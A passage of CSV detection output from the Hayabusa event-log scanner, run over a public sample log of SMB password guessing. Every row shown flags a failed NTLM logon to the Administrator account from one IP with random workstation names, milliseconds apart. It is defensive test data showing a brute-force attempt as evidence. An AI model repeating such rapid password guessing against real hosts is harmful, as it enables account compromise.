NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ALJxKGwyZz7JDpRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q8tioTO3TEIzdzY0 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.905 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5dIKTgQkvPKzKJoZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.947 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ta0IMrlArbgONhDG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:17.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MKNUu4624Rvr87kK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n7jIL2FkXzWqvWTJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oJMVh1zdQt7EikVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:18.113 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OqvximSAPlXZ3An : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tr2GQ1F3jccpWrsm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CCmbvQXXXzhHOdMG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qTp1BwPv8XiK2mrG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rnb19AXxM5ArcLxX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUS5CKq2W1rkq46d : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FzKSUVdsC5eENWDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QFL07Mhy4iw5psBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMpitnzLXDLSXL73 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSfaPdcsiRQoGYYm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.616 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PJRP4bS9Qgg06Z5P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:18.679 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3Z4veMNKngHUDoRf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmF0YFgAMSRotb1y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DmrbO3dZw46DgmZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qg4CMwLpfzLrvDPj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.850 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BKDKUXNNhuSqRiTE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cBocrjNXjmuPCKRJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: loCrAXibgVxcOtCM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:18.966 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZ7pHOJeOExrON2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.006 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MeucKpaodpmdsqhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LRlmBeBlV6n4MQyo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E8FYOF6HxJHqm7GW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:19.122 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9tBtz1GYn5J8sbFH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Qn8PlxEzIu9AKUgt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdjqlNDU3U150UAw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esaTfuwuiFAkIVs6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y4LbVQ5ytgVCqFmL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rWoX76sgYTVwxkD5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.386 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QQFJRRYn6sjYK5cD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wyVuBGEFGJqImQ7W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pRvnyVGxG8i0e3PQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X6Hv2fj43a8j1O2P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: myP4zVFyw2qE1SV7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:19.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lpmBcVilH72dYF7E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Jd9hKGDxLcnZphlL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OmXgOD9kaGJ4PIA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BpQtWW0fAEzNH28B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EgNkY8LKSWcnLM00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.813 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z8S1dUwb3HjOnEs9 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 49ZKcnswdISJDwbS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qOuYmww71pTM0l3t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PUHoGgmXKRJknRZG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:19.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6yf8LSkcwBP9s1mN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.036 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmH2AMDmkZVbCt8b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:20.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I23o9EQLpPpn9RlY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MrEVj3DB1prpOtnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Iau1IHKxWRsqQaG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdPC9LVhZS2l27XF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxcofRpjCFme3mg2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e1VnQLbETh1GgX0c : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rbdPYXx8mx4SV9G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcv3HWid3auIu7cY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2OviUvdOmk5HON : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bVBSORhgFwTy2TWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DsIhCEZcfYenufvf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:20.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDadVFtE4toNiagy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.601 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnydJjDBdzJWqmWa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GW8im2IhNzrGoSFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aTzlqq9HLEX6wzdU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gz98aGXd0fdVzmTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q2zOy64cp6dXelNl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X1BflxNjQRNopjb4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.914 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 401ulFeuzCtp5lPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:20.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p0SIzJrzkseFB1j8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cyQMxtEdbud8iJLI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gbjIqxD4E6fYsGx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
